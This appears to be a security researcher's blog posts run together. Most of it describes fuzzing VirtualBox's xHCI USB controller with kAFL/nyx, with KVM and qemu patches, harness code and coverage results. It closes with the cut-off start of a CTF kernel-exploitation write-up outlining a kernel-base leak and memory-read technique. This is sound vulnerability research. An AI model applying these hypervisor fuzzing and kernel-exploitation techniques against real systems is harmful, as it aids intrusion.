I patched qemu-nyx and KVM-PT to be able to submit a different cr3 to filter within the fuzzing loop. In qemu I basically just needed to by remove an if statement:

diff --git a/nyx/pt.c b/nyx/pt.c
index d78bc58522..a2c1d8a881 100644
--- a/nyx/pt.c
+++ b/nyx/pt.c
@@ -151,17 +151,13 @@ int pt_set_cr3(CPUState *cpu, uint64_t val, bool hmp_mode)
     int r = 0;
 
     if (val == GET_GLOBAL_STATE()->pt_c3_filter) {
-        return 0; // nothing changed
+       return 0; // nothing changed
     }
 
-    if (cpu->pt_enabled) {
-        return -EINVAL;
-    }
     if (GET_GLOBAL_STATE()->pt_c3_filter && GET_GLOBAL_STATE()->pt_c3_filter != val) {
-        // nyx_debug_p(PT_PREFIX, "Reconfigure CR3-Filtering!\n");
+        nyx_printf("Reconfigure CR3-Filtering! pt_c3_filter (%llx) != (%llx)\n", GET_GLOBAL_STATE()->pt_c3_filter, val);
         GET_GLOBAL_STATE()->pt_c3_filter = val;
-        r += pt_cmd(cpu, KVM_VMX_PT_CONFIGURE_CR3, hmp_mode);
-        r += pt_cmd(cpu, KVM_VMX_PT_ENABLE_CR3, hmp_mode);
+       r += pt_cmd(cpu, KVM_VMX_PT_CONFIGURE_CR3, hmp_mode);
         return r;
     }
     GET_GLOBAL_STATE()->pt_c3_filter = val;

In KVM it was pretty easy to patch as well, I just removed some checks:

diff --git a/arch/x86/kvm/vmx/vmx_pt.c b/arch/x86/kvm/vmx/vmx_pt.c
index f55b9fdce..bd1c76b84 100644
--- a/arch/x86/kvm/vmx/vmx_pt.c
+++ b/arch/x86/kvm/vmx/vmx_pt.c
@@ -490,14 +490,18 @@ static long vmx_pt_ioctl(struct file *filp, unsigned int ioctl, unsigned long ar
                        if(!is_configured) {
                                vmx_pt_config->ia32_rtit_cr3_match = arg; 
                                r = 0;
+                               printk("Intel PT reconfigured: %llx\n", vmx_pt_config->ia32_rtit_cr3_match);
                        }
                        else{
                                printk("Intel PT KVM_VMX_PT_CONFIGURE_CR3 (is_configured: true) ...\n");
+                               vmx_pt_config->ia32_rtit_cr3_match = arg;
+                                r = 0;
+                               printk("Intel PT reconfigured: %llx\n", vmx_pt_config->ia32_rtit_cr3_match);
                        }
                        break;
                case KVM_VMX_PT_ENABLE_CR3:
                        /* we just assume that cr3=NULL is invalid... */
-                       if((!is_configured) && vmx_pt_config->ia32_rtit_cr3_match && !vmx_pt_config->multi_cr3_enabled){
+                       if(vmx_pt_config->ia32_rtit_cr3_match && !vmx_pt_config->multi_cr3_enabled){
                                vmx_pt_config->ia32_rtit_ctrl_msr |= CR3_FILTER;
                                r = 0;
                        }
@@ -508,7 +512,7 @@ static long vmx_pt_ioctl(struct file *filp, unsigned int ioctl, unsigned long ar
 
                        break;
                case KVM_VMX_PT_DISABLE_CR3:
-                       if((!is_configured) && (vmx_pt_config->ia32_rtit_ctrl_msr & CR3_FILTER)){
+                       if((vmx_pt_config->ia32_rtit_ctrl_msr & CR3_FILTER)){
                                vmx_pt_config->ia32_rtit_ctrl_msr ^= CR3_FILTER;
                                r = 0;
                        }

Adding the fuzzer's callback to the device struct

To make easier the debugging and the hooking we need to be able to use the fuzzer API wherever we are in the code base, to do so we can add a field to the structure definition of both PDMDEVREGR0 (ring0) and PDMDEVREGR3 (ring3):

// VirtualBox-7.1.8/include/VBox/vmm/pdmdev.h

/**
 * PDM Device Registration Structure, ring-0.
 *
 * This structure is used when registering a device from VBoxInitDevices() in HC
 * Ring-0.  PDM will continue use till the VM is terminated.
 */
typedef struct PDMDEVREGR0
{
    [...]
    DECLR0CALLBACKMEMBER(int, pfnCallbackKafl, (PPDMDEVINS pDevIns, int cmd, uintptr_t a1, uintptr_t a2)); // last field to not break the other fields
}

/**
 * PDM Device Registration Structure.
 *
 * This structure is used when registering a device from VBoxInitDevices() in HC
 * Ring-3.  PDM will continue use till the VM is terminated.
 *
 * @note The first part is the same in every context.
 */
typedef struct PDMDEVREGR3
{
    DECLR3CALLBACKMEMBER(int, pfnCallbackKafl, (PPDMDEVINS pDevIns, int cmd, uintptr_t a1, uintptr_t a2)); // last field to not break the other fields
}

Functions interacting with the guest memory

As far as I have read, the XHCI device is only using PDMDevHlpPCIPhysReadMeta and PDMDevHlpPCIPhysReadUser to read data from the L2 memory. From a fuzzing perspective it means we need to hook those two functions to make them process the fuzzy input instead.

THIS ARTCLE IS NOT FINISHED!!

VirtualBox fuzzing - Basic harness

Sun, 28 Sep 2025 00:00:00 GMT

Introduction

In 2025 I completed an internship at Out of bounds leveraging me to research for roughly 5 months for bugs in the VirtualBox USB stack (xHCI). In this blogpost I will explain mu workflow and how I managed to fuzz this subsystem by using kAFL/nyx.

xHCI

eXtensible Host Controller Interface (xHCI) is the latest standard for USB host controller devices. It is backward compatible for both USB 1.0 and 2.0 protocols. The xHCI controller is implemented in VirtualBox as a cross-platform device in src/VBox/Devices/USB/DevXHCI.cpp. The xHCI device has to emulate quite complex behaviors, especially transfer rings which are to me one of the most interesting attack surfaces. In this section I will describe how it works and which are the known bugs on the surface. This information is based on the VirtualBox implementation and on the xHCI specifications.

A xHCI controller interacts with the system through a #emph[MMIO area]. On VirtualBox it is structured as below:

The Capability Registers ([0x0000 - 0x007F]) give read only information about the host controller, especially the doorbell offset.
The Runtime Registers [0x2000 - 0x3000] manage the interrupts and the event ring segment.
The Extended Capabilities [0x1000 - 0x13FF] manages LEDs and other minor features.
The Operational Registers [0x0080 - 0x03FF] are responsible for the command management (USBCMD register).
The Doorbell array [0x3000-0xffff] is an array of 256 doorbell registers. A doorbell register allows to manage a specific device through its DB target field. A doorbell register can be "rung" to ask a device to perform operations on a usb device through the transfer rings.

Transfer Ring and TRB

A ring is a circular data structure, xHCI is using three different kind of rings: the command ring, the event ring and the transfer ring. Actually the command ring and the event are heavily rely on the transfer ring. The transfer ring is the ring that manages data transfer between a USB device and the software (in our case the nested guest). Those transfer are directional and are very complex operations, this might be, to me, the most buggy code surface by design in xHCI implementations. I will describe briefly some of its features, you can refer to the xHCI specifications.

To transfer data from the host memory to the USB device, the USB device allows the host controller to register different endpoints according to the type of the transfer and to its direction (device to host, host to device). All of the endpoints of a device are grouped together under the Device structure and all of the Device Context structures are grouped under the hub structure.

It might seem unnecessary to dig into the internals of the TRB management but the way VirtualBox is implementing it is key to lead successful fuzzing campaign. A basic TRB contains a pointer to the target data to transfer, its length and a type field that is describing its mode (isochronous, control, bulk, interrupt, Scatter/Gather). According to the type of the transfer it leads to complex interactions which makes the TRB structure behaving very differently.

Vulnerability research perspective

From a vulnerability research perspective, the TRB management surface seems a very promising attack surface because of its complexity. But it has a major drawback: to fuzz the TRB requests we need to already have an available endpoint to connect to. Then we assume there is at least a USB device connected to the host controller of the hypervisor. Furthermore, we should emulate it for fuzzing purposes. Another issue is that some transfer are actually asynchronous, which makes the harnessing quite difficult. At this point I'm not sure the TRB are the best surface to fuzz because of the complexity of the fuzzing process. That's why it is not the first surface I targeted in the xHCI device.

Preliminary work

At the start of my internship I really wanted to dig into kafl/nyx because I already had experience using it for kernel fuzzing. Moreover, I was very excited about how easy it is to initialize the fuzzing loop and to perform full-system snapshotting. I already explained how kafl/nyx is working theoretically, I will describe here how I concretely used to to perform nested fuzzing and then just hypervisor fuzzing.

Setup

I spent weeks trying to build the right setup to perform nested fuzzing, this task was very time consuming. To fuzz VirtualBox we need to instrument both the ring0 and ring3 components of VirtualBox and we need to add KASAN support to the L1 kernel and ASAN support for the ring3 component. Furthermore, given we are fuzzing the xHCI subsystem, we need to add xHCI support for the L1 kernel.

Setups for nested fuzzing really look like a matryoshka, we are building a L2 linux kernel which will be emulated by a hypervisor (custom VirtualBox) running inside the L1 (a custom ubuntu server). The L1 is emulated by Qemu-PT and makes use of the KVM-PT module loaded in the L0. Both L1 and L2 and handled by the L0 KVM-PT module through paravirtualization. The L0 is not actually treating the L2 as a nested guest, emulated by the harnessed VirtualBox hypervisor running inside of the L1.

Building the L0, L1 and L2 kernel

I needed to edit the KVM-PT modules loaded on the L0 so I needed to build a custom L0 kernel too. To build the L0 kernel and the custom KVM module you can refer to the Makefile in build_kernel/Makefile (rule fullBuild to build and install the kernel and rule kvm to just compile and load the KVM modules). To build the L1 kernel the Makefile is in vbox/Makefile (rule linuxBuild) once the L1 kernel is built you should install it on the L1 image, to do so you need to boot on the L1 (sudo ./gen_L1/run.sh) and run make linuxBuild that will install the kernel and the modules in the L1. The L1 kernel is built with USB_XHCI_HCD, USB_PCI, KASAN and KASAN_INLINE options enabled. The L2 kernel is built when the L2 boot image is created (Makefile file, run_harness rule) the L2 is linked with the nyx_api.h API header.

Building the L2 iso

After building the L2 kernel we need to build the iso file of the L2 agent os that will be emulated by the target hypervisor. To do so I generate a initrd with ./gen_initrd.sh and I edit the grub entry to boot on the newly built L2 kernel. And I finally insert the kernel module harness I built upon the L2 kernel in the initramfs. Once the L2 iso is successfully built I insert it into the L1 .qcow2 file using guestmount. NOTE: you need to install the package named grub-pc-bin otherwise the created iso will not boot.

Booting on the L1

To boot on the L1 image you can start ./gen_L1/run.sh and if it is the first time you run to the Virtual Machine you need to append you publickey in ~/.ssh/authorized_keys. This can be achieved by using the qemu console and the shared folder created at boot startupm it is located in ./vbox on the host and is mounted on /mnt/shared on the L1. Once it's done you can just use ssh to connect to the L1: ssh nasm@locahost -p 2222.

NOTE: You need to have at least 15G to boot on the L1, otherwise it will assume you're running in fuzzing mode and will start issuing nyx hypercalls.

Building VirtualBox

I created a build script on the L1 to build VirtualBox and its kernel modules: ./buil.sh. From my experiments VirtualBox needs to be configured with --disable-java --build-headless --disable-docs --disable-hardening and I built it using the ASAN BUILD_TYPE to be able to catch any out of bound read / write access.

Configuring and starting the L2 virtual machine

We built the boot iso file to boot on but we still need to configure the L2 virtual machine to enable xHCI support and paravirtualization. The virtual machine is described by the out.vbox file on the L1. The name of the L2 virtual machine is target_L2 and its configuration can be dumped like this using VBoxManage: sudo ./VirtualBox-7.1.8/out/linux.amd64/asan/bin/VBoxManage showvminfo target_L2.

To start the virtual machine I chose to pin the VirtualBox process on the cpu 0 using tasklet: sudo taskset --cpu-list 0 ./VBoxManage startvm "target_L2" --type headless. The ~/run.sh script is started at the startup and is basically a systemd service. According to the amount of memory the L1 got, it is assuming to run fuzzing mode or in persistent mode (with a standard qemu version). If it is running in fuzzing mode it starts the L2 virtual machine.

The L2 harness

The code is located in the module_harness directory.

The L2 harness is a kernel module loaded at the boot startup, it needs to interact with the MMIO area of the xHCi controller, to do so we have to unload the existing xHCI device (unbind_xhci_driver function) and allocate a PCI region were the xHCI registers will be mapped (xhci_fuzzer_init). Once the PCI region is allocated we can read and write to the xHCI MMIO area.

static void unbind_xhci_driver(void)
{
    struct pci_dev *pdev = NULL;

    // Find the xHCI controller
    pdev = pci_get_class(PCI_CLASS_SERIAL_USB_XHCI, NULL);
    if (!pdev) {
        printk(KERN_ERR "No xHCI controller found\n");
        return;
    }

    // Unbind the standard driver
    if (pdev->dev.driver) {
        printk(KERN_INFO "Unbinding xhci_hcd driver\n");
        device_release_driver(&pdev->dev);
    }

    pci_dev_put(pdev);
}

static int __init xhci_fuzzer_init(void)
{
    struct pci_dev *pdev = NULL;

    unbind_xhci_driver();

    // Find xHCI controller
    while ((pdev = pci_get_class(PCI_CLASS_SERIAL_USB_XHCI, pdev))) {
        if (pci_enable_device(pdev)) {
            printk(KERN_ERR "Failed to enable PCI device\n");
            continue;
        }

        if (pci_request_regions(pdev, MODULE_NAME)) {
            printk(KERN_ERR "Failed to request PCI regions\n");
            pci_disable_device(pdev);
            continue;
        }

        xhci_mmio_base = pci_iomap(pdev, 0, 0);
        if (!xhci_mmio_base) {
            printk(KERN_ERR "Failed to map MMIO space\n");
            pci_release_regions(pdev);
            pci_disable_device(pdev);
            continue;
        }

        xhci_pci_dev = pdev;
        break;
    }
}

Fuzzing

Once we get there we got the very basic material to enable nested fuzzing. During my internship I wanted to first dig into nested fuzzing. That means to be able to perform most of the fuzzing logic from the L2 nested guest with minimal changes into the target hypervisor. To be able to perform fuzzing using kafl/nyx we need to be able to achieve the following operations:

Initialization handshake with the fuzzer frontend, through a HYPERCALL_KAFL_ACQUIRE / HYPERCALL_KAFL_RELEASE sequence.
submit the fuzzer configuration through the SET_AGENT_CONFIG.
submit the payload address the fuzzer will write the input to, through HYPERCALL_KAFL_GET_PAYLOAD / KAFL_NESTED_PREPARE.
take the initial snapshot and actually write the content of the payload in memory, through the HYPERCALL_KAFL_NEXT_PAYLOAD hypercall.
start recording the coverage data with HYPERCALL_KAFL_ACQUIRE.
end the fuzzing loop and restore the initial snapshot through HYPERCALL_KAFL_RELEASE.

This process is the same for any kind of fuzzing, nested or not, when we use kAFL @kafl. What is targeted through my different harnesses is the kernel context of the xHCI driver (which is part of the kernel module VBoxDDR0.r0). The evaluation results are done on a Intel(R) Core(TM) i5-10600K CPU @ 4.10GHz with 12 cores and 32G of ram memory.

Building the corpus

The issue with the VirtualBox devices fuzzing is that the entry point of the device lies in a kernel module while most of the actual -- and buggy -- logic lies into the usermode process. To get access to the usermode code we need to first build an corpus that would go through the kernel module without being rejected. That's why I am evaluating my different fuzzer implementations against the kernel code mainly. Because I spent a lot of time trying to fix my harness I couldn't actually run one implementation for a long time, which means my corpus is pretty basic yet. To build the corpus I adopted the following design: I keep calling xhciMmioWrite until it returns VINF_IOM_R3_MMIO_WRITE, the return value indicating the write request should be treated in usermode. When it returns this value I send a crash report to the fuzzer frontend so the input can be sorted differently compared to the regular inputs.

Ip ranges

To be able to do coverage guided fuzzing we need to give to the fuzzing frontend the specific IP range we would like to trace. It would be easy it this code range belonged to the linux kernel, but unfortunately the VirtualBox kernel devices are loaded dynamically at a random location in the kernel memory, even when the KASLR is disabled. To track the right areas I hooked the internal VirtualBox kernel module loading mechanism.

When VirtualBox wants to load a kernel module it sends an ioctl request to the vboxdrv kernel driver. Then, vboxdrv loads the requested image in supdrvIOCtl_LdrOpen, right after mapping the module I just check the names of the modules and I send a hypercall to the fuzzer frontend to register two ip ranges for the modules VBoxDDR0.r0 and VMMR0.r0. This way we are only tracing the code in the VBoxDDR0.r0 device that is managing the devices, especially the HXCI device. VMMR0.r0 is the Virtual Machine Monitor code containing the libraries and API devices are using to interact with the virtual machine.

Nested fuzzing

What seems very promising to me is how nested fuzzing can almost be target agnostic. Using kafl/nyx we only need to submit the cr3 of the process we want to fuzz. Everything else can be achieved outside of the L1, in both the L0 KVM module and in this L2 harness kernel module. This is what should be theoretically possible but concretely it is far more difficult. There are two main limitations, first to be able to trace the right code in the hypervisor process we need to get the cr3 value of the L1 target process. And the process that receives the interrupts from the L0 KVM module might be a wrapper process.

With those limitations in mind, I started to look for a way to create a payload in the L2 and to start a basic fuzzing loop that will fuzz the MMIO area of the xHCI device by writing a random value at a random offset. However, according to the kAFL documentation, nested hypercalls are "roughly equivalent hypercalls for use with nested virtualization (when agent is a L2 guest)" but are untested and not fully supported yet. So I started looking at the code in the KVM-PT L0 module (build_kernel/kafl.linux/arch/x86/kvm/vmx/nested.c), the hypercall handling is done in the nested_vmx_l1_wants_exit function. This function is not doing much, it is mostly forwarding the hypercall to QEMU-pt, except for two hypercalls: HYPERCALL_KAFL_NESTED_PREPARE and HYPERCALL_KAFL_NESTED_HPRINTF. HYPERCALL_KAFL_NESTED_HPRINTF just reads the hypercall argument, the physical address of the hprintf buffer, and translates it to a L1 physical address (pa) and provide this new address to qemu. HYPERCALL_KAFL_NESTED_PREPARE allows the L2 guest to submit an array of pointers that will be mapped to the payload 1:1 as a non contiguous mapping. This is meant to be a way to provide pointers to different MMIO areas of different devices so when the payload actually gets written, different MMIO areas, not memory contiguous, could be fuzzed. The role of the KVM module here is just to translate those pointers to a valid L1 physical address that will be processed by qemu (qemu only knows about the L1 context).

// build_kernel/kafl.linux/arch/x86/kvm/vmx/nested.c

/*
 * Return 1 if L1 wants to intercept an exit from L2.  Only call this when in
 * is_guest_mode (L2).
 */
static bool nested_vmx_l1_wants_exit(struct kvm_vcpu *vcpu,
                                     union vmx_exit_reason exit_reason)
{
        struct vmcs12 *vmcs12 = get_vmcs12(vcpu);
        u32 intr_info;

        switch ((u16)exit_reason.basic) {
        case EXIT_REASON_EXCEPTION_NMI:
                intr_info = vmx_get_intr_info(vcpu);
                if (is_nmi(intr_info))
                        return true;
                else if (is_page_fault(intr_info))
                        return true;
                return vmcs12->exception_bitmap &
                                (1u << (intr_info & INTR_INFO_VECTOR_MASK));

[...]

#ifndef CONFIG_KVM_NYX
        case EXIT_REASON_VMCALL: case EXIT_REASON_VMCLEAR:
#else
        case EXIT_REASON_VMCALL:
                if ((kvm_register_read(vcpu, VCPU_REGS_RAX)&0xFFFFFFFF) == HYPERCALL_KAFL_RAX_ID && (kvm_register_read(vcpu, VCPU_REGS_RBX)&0xFF000000) == HYPERTRASH_HYPERCALL_MASK){
                        switch(kvm_register_read(vcpu, VCPU_REGS_RBX)){

                                case HYPERCALL_KAFL_NESTED_CONFIG:
                                        vcpu->run->exit_reason = KVM_EXIT_KAFL_NESTED_CONFIG;
                                        break;

                                case HYPERCALL_KAFL_NESTED_PREPARE:
                                        prepare_nested(vcpu, vmcs12);
                                        break;

                                case HYPERCALL_KAFL_NESTED_ACQUIRE:
                                        vcpu->run->exit_reason = KVM_EXIT_KAFL_NESTED_ACQUIRE;
                                        break;

                                case HYPERCALL_KAFL_NESTED_RELEASE:
                                        vcpu->run->exit_reason = KVM_EXIT_KAFL_NESTED_RELEASE;
                                        break;

                                case HYPERCALL_KAFL_NESTED_HPRINTF:
                                        vcpu->run->exit_reason = KVM_EXIT_KAFL_NESTED_HPRINTF;
                                        vcpu->run->hypercall.args[0] = handle_hprintf(vcpu);
                                        break;

                                case HYPERCALL_KAFL_NESTED_EARLY_RELEASE:
                                        vcpu->run->exit_reason = KVM_EXIT_KAFL_NESTED_EARLY_RELEASE;
                                        break;
                        }
                }

                return true;
        case EXIT_REASON_VMCLEAR:
#endif

[...]
}

The issue I encountered is that the address translation between the L2 and L1 context wasn't handling well the case when the L2 guest had paging enabled. After literally trying hard on this issue for weeks I finally figured it out by using the L1 memory management unit directly (vcpu->arch.mmu->gva_to_gpa, instead of calling kvm_translate_gpa) against a L1 pa.

// build_kernel/kafl.linux/arch/x86/kvm/vmx/nested.c

u64 g2va_to_g1pa(struct kvm_vcpu *vcpu, struct vmcs12* vmcs12, u64 addr){

        u64 gfn = 0;
        u64 real_gfn = 0;

        struct x86_exception exception;

        real_gfn = vcpu->arch.mmu->gva_to_gpa(vcpu, vcpu->arch.mmu, addr, PFERR_USER_MASK | PFERR_WRITE_MASK, &exception);

        if (real_gfn == INVALID_GPA) real_gfn = kvm_translate_gpa(vcpu, vcpu->arch.mmu, addr, PFERR_USER_MASK | PFERR_WRITE_MASK, &exception);
        printk("l2pa: %llx => l1pa: %llx\n", addr, real_gfn);
        return real_gfn;
}


void prepare_nested(struct kvm_vcpu *vcpu, struct vmcs12* vmcs12){
        u64 guest_level_2_data_addr = kvm_register_read(vcpu, VCPU_REGS_RCX) & 0xFFFFFFFFFFFFFFFF;
        printk(KERN_EMERG "HyperCall from Guest Level 2! RIP: %lx (created_vcpus: %x): %llx\n", kvm_register_read(vcpu, VCPU_REGS_RIP), vcpu->kvm->last_boosted_vcpu, guest_level_2_data_addr);

        u64 address = guest_level_2_data_addr & 0xFFFFFFFFFFFFF000ULL;
        u16 num = guest_level_2_data_addr & 0xFFF;
        u16 i = 0;

        u64 old_address = 0;
        u64 new_address = 0;

        u64 page_address_gfn = g2va_to_g1pa(vcpu, vmcs12, address) >> 12;

        for(i = 0; i < num; i++){
                kvm_vcpu_read_guest_page(vcpu, page_address_gfn,  &old_address, (i*0x8), 8);
                printk("READ -> %llx\n", old_address);
                new_address = g2va_to_g1pa(vcpu, vmcs12, old_address);
                kvm_vcpu_write_guest_page(vcpu, page_address_gfn,  &new_address, (i*0x8), 8);
                printk("%d: %llx -> %llx\n", i, old_address, new_address);
        }

        vcpu->run->exit_reason = KVM_EXIT_KAFL_NESTED_PREPARE;
        vcpu->run->hypercall.args[0] = num;
        vcpu->run->hypercall.args[1] = (page_address_gfn) << 12;
        vcpu->run->hypercall.args[2] = vmcs12->host_cr3 & 0xFFFFFFFFFFFFF000;
}

Basic Harness

My first idea was to allocate the payload in the L2 harness by issuing very specific MMIO requests to the target hypervisor from the L2, so when the hypervisor receives those requests, it performs various actions such as: initializing the fuzzer state from the MMIO handling context, start the fuzzing loop, and enable tracing and exiting the fuzzing loop.

Concretely, the L2 harness just uses the HYPERCALL_KAFL_NESTED_PREPARE to provide the L2 kernel buffer to the fuzzer frontend. And then a few MMIO requests on the xHCI MMIO area are issued to initialize and start the fuzzing loop:

// include/nyx_api.h
// kafl_agent_init (L2 context)

static void kafl_agent_init(uint64_t mmio)
{
        int i = 0;
        uint8_t* payload_target = NULL;

        hprintf_buffer = (uintptr_t)get_zeroed_page(GFP_KERNEL);

        if (agent_initialized) {
                kafl_habort("Warning: Agent was already initialized!\n");
        }

        kafl_hprintf("[*] Initialize kAFL Agent\n");

        payload_buffer_size = 0x2000;
        payload_buffer = (uint64_t* )get_zeroed_page(GFP_KERNEL);
        payload_target = (uint8_t* )get_zeroed_page(GFP_KERNEL);

        for (i = 0; i < 10; ++i) {
                if (!mmio) payload_buffer[i] = (uint64_t)virt_to_phys(payload_target);
                else payload_buffer[i] = (uint64_t)mmio;
        }

        ve_buf = payload_target; // internal kafl_fuzz_buffer ptr
        ve_num = 0x1000;  // internal kafl_fuzz_buffer sz
        if (!payload_buffer) {
                kafl_habort("Failed to allocate host payload buffer!\n");
        }

        kAFL_hypercall(HYPERCALL_KAFL_NESTED_PREPARE,( (uint64_t)virt_to_phys(payload_buffer)) | 1);
}

// module_harness/main.c
// basic harness for nested fuzzing (L2 kernel module)

void
dumb_fuzzing(void)
{
        uint32_t val = 0;
        uint32_t i = 0;
        uint32_t offt = 0;

        xhci_write32(0x1338, 0x8888); // init
        kafl_hprintf("kafl init called in the L1\n");
        xhci_write32(0x1348, 0x8888); // start fuzzing and acquire

        for (i = 0; i < 1; ++i) {
                kafl_fuzz_buffer(&offt, sizeof(offt));  
                kafl_fuzz_buffer(&val, sizeof(val));
                
                xhci_write32(offt, val); // fuzz 
        }
        
        xhci_write32(0x1340, 0x8888); //release 
}

From the L1 perspective, we need to instrument the target device writer handler xhciMmioWrite by adding the handlers for the MMIO requests we discussed right above:

// VirtualBox-7.1.8/src/VBox/Devices/USB/DevXHCI.cpp
// Basic L1 for the hypervisor to enable nested fuzzing

static DECLCALLBACK(VBOXSTRICTRC) xhciMmioWrite(PPDMDEVINS pDevIns, void *pvUser, RTGCPHYS off, void const *pv, unsigned cb)
{
    PXHCI               pThis  = PDMDEVINS_2_DATA(pDevIns, PXHCI);
    uint32_t      offReg = (uint32_t)off;
    uint32_t *    pu32   = (uint32_t *)pv;
    uint32_t            iReg;
    RT_NOREF(pvUser);

    VBOXSTRICTRC rcStrict = VINF_SUCCESS;

#if defined(IN_RING0)
    if (0x1338 == offReg
        && 0x8888 == *pu32) {
        kafl_agent_init();

        return rcStrict;
    } else if (0x1340 == offReg
        && 0x8888 == *pu32) {
        kAFL_hypercall(HYPERCALL_KAFL_RELEASE, 0);
        return rcStrict;
    } else if (0x1348 == offReg
        && 0x8888 == *pu32) {
        kAFL_hypercall(HYPERCALL_KAFL_NEXT_PAYLOAD, 0);
        kAFL_hypercall(HYPERCALL_KAFL_ACQUIRE, 0);
        return rcStrict;
    }
#endif


    rcStrict = xhciMmioWriteFuzzInternal(pDevIns, pvUser, off, pu32, sizeof(uint32_t));

    // to avoid an assert to crash in the calling function, unreliable af tho
    if(  rcStrict == VINF_SUCCESS
                  || rcStrict == VINF_EM_DBG_STOP
                  || rcStrict == VINF_EM_DBG_EVENT
                  || rcStrict == VINF_EM_DBG_BREAKPOINT
                  || rcStrict == VINF_EM_OFF
                  || rcStrict == VINF_EM_SUSPEND
                  || rcStrict == VINF_EM_RESET) {

        return rcStrict;
    } else{
        return VINF_SUCCESS;
    }

[...]
}

Feeding the fuzzer with the MMIO area

Another type of harness I tried was heavily inspired on the HyperCube design @hypercube. Instead of giving the physical address of a L2 regular kernel buffer I tried to supply directly the address of the MMIO area (fetched with pci_resource_start). The issue is that qemu isn't tracking well the MMIO areas, they do not get added to the bitmap that is tracking the dirty pages. I think I could solve this by patching the KVM-PT L0 module.

If I manage to do it I could register tons of different MMIO areas for different devices and, all at once, fuzz them HYPERCALL_KAFL_NESTED_PREPARE. The would trigger a lot of different write requests all over the target MMIO areas.

Results

To be honest, the nested fuzzing wasn't working properly until I gave it another try while writing this report. By recording coverage the VMMR0.r0 and VBoxDDR0.r0 VirtualBox kernel modules, I got the following results after one hour and half: 7.5M executions, 2213 edges and 5641 blocks.

Compared to the L1 fuzzing, nested fuzzing sounds to be way slower but way more stable at the same time. This is the approach which is the most similar to the HyperCube design by leveraging both nested fuzzing and coverage guided fuzzing.

L1 fuzzing

After trying unsuccessfully to to nested fuzzing through the MMIO regions I had another idea: fuzzing the MMIO handling surface by simply inserting my harness when the first read / write request is reached in the MMIO read / write handler. Then, from there, I can just perform a regular fuzzing loop by calling the internal xHCI MmioWrite / MmioRead handler. This is a much more basic approach was very promising but is less reliable, indeed the MMIO write requests are first filtered by the iomMmioHandlerNew function, and I am starting to fuzz the interface after the L2 guest request has been filtered and checked already.

This harness is iterating five times through the xhciMmioWrite function feeding it with arguments supplied by the fuzzer and when xhciMmioWrite returns a usermode code we keep track of the arguments by saving the input. The kernel buffer is allocated with (SUPR0ContAlloc or __get_free_pages) and is shared with the userland context of the device. Which means that if the fuzz iteration ends up in userland you can keep using the kafl_fuzz_buffer with the input payload.

Issues

I really struggled to write a working harness. I spent most of the internship trying to make it reliable, which means, avoiding timeouts and non-deterministic behaviors. The first issue is the how the assertions should be handled, I tried to dig as deeply as possible into the assertion management system. I ended up hooking RTAssertShouldPanic, which appeared to be, to me, the most commonly used function when it comes to internal assertions treatment. I aimed to add the HYPERCALL_KAFL_RELEASE hypercall to this function in case it is crashing, then it would have had restarted the fuzzing loop when an assert fails. But apparently this doesn't work. Instead I just commented out all of the assert calls in the device source code. This is very ugly, instead I should replace them by a HYPERCALL_KAFL_RELEASE hypercall.

Results

I got better results after trying this approach. This is due to the lack of context switches between VirtualBox and the L2 guest, by avoiding the context switches I can focus on fuzzing the target xhciMmioWrite interface. After one hour of fuzzing without a prior corpus I got the following results: 7.5M executions, 614 blocks and 327 edges. L1 fuzzing is two times faster than nested fuzzing.

The fuzzer is stable and deterministic, there are less edges and blocks reached compared to the nested fuzzing campaign because we are only tracing the coverage inside of the target device. When we are performing nested fuzzing, the context switches are going through a lot of code, and then, are increasing the code coverage artificially.

// VirtualBox-7.1.8/src/VBox/Devices/USB/DevXHCI.cpp
// Basic harness directly in the L1 hypervisor code

static DECLCALLBACK(VBOXSTRICTRC) xhciMmioWrite(PPDMDEVINS pDevIns, void *pvUser, RTGCPHYS off, void const *pv, unsigned cb)
{
    PXHCI               pThis  = PDMDEVINS_2_DATA(pDevIns, PXHCI);
    uint32_t      offReg = (uint32_t)off;
    uint32_t *    pu32   = (uint32_t *)pv;
    uint32_t            iReg;
    RT_NOREF(pvUser);

    VBOXSTRICTRC rcStrict = VINF_SUCCESS;

    if (0x1448 == offReg && 0x8888 == *pu32) {

            kAFL_hypercall(HYPERCALL_KAFL_NEXT_PAYLOAD, 0);
            kAFL_hypercall(HYPERCALL_KAFL_ACQUIRE, 0);

            for (int i = 0; i < 5; ++i) {
                    kafl_fuzz_buffer(&off, sizeof(off));
                    kafl_fuzz_buffer(pu32, sizeof(*pu32));

                    // validate the offset
                    if ((off & 0x3) || !xhci_is_interesting(off)) continue;

                    rcStrict = xhciMmioWriteFuzzInternal(pDevIns, pvUser, off, pu32, sizeof(uint32_t));

                    if ((VBOXSTRICTRC)VINF_IOM_R3_MMIO_WRITE == rcStrict) {
                        kAFL_hypercall(HYPERCALL_KAFL_RELEASE, 0);
                        return rcStrict;
                    }
            }

            kAFL_hypercall(HYPERCALL_KAFL_RELEASE, 0);
    }
}

Conclusion

I detailed two types of harnesses which appear to work against the ring0 xHCI module emulated by VirtualBox. I didn't have time to test this approach against the user mode code -- where the main logic lies -- but this shouldn't be so different compared to the ring0 fuzzing. The L1 fuzzing approach ended up being quite deterministic and surprisingly fast and stable and only requires to add a small harness into the target device. Even though I didn't find any bugs during the fuzzing campaign, I am very optimistic for the upcoming improvements and their ability to trigger buggy code paths.

[ImaginaryCTF 2023 - pwn] window-of-opportunity

Mon, 24 Jul 2023 00:00:00 GMT

window-of-opportunity

window-of-opportunity (490 pts) - 11 solves by Eth007

Description: Sometimes, there is a glimmer of hope, a spark of inspiration, a window of opportunity.

Attachments https://imaginaryctf.org/r/izYM0#opportunity_dist.zip

nc window-of-opportunity.chal.imaginaryctf.org 1337

window-of-opportunity is a kernel exploitation challenge I did for the ImaginaryCTF 2023. We are given an arbitrary read primitive (and a stack buffer overflow but I didn't use it), and the goal is basically to read the /flag.txt file. All the related files can be found there.

TLDR:

Leaking with the help of the arbitrary read primitive the kernel base address by reading a pointer toward the .text stored within the fix-mapped cpu_entry_area mapping.
Using the read primitive to read the whole kernel memory to get the flag given the initramfs is mapped in clear right after the kernel at a fixed offset.
PROFIT

Code review

We are given a classic initramfs setup for this kernel challenge, which means we already know the whole initramfs will be mapped in memory right after the kernel at a fixed offset.

Let's take at the ioctl provided by the kernel driver we have to pwn:

/* !! This is not the actual decompiled code, I rewrote it to make it easier to read */

__int64 __fastcall device_ioctl(file *filp, __int64 cmd, unsigned __int64 arg)
{
  __int64 v3; // rbp
  __int64 v4; // rdx
  __int64 v5; // rbx
  __int64 result; // rax
  request req; // [rsp+0h] [rbp-120h] BYREF
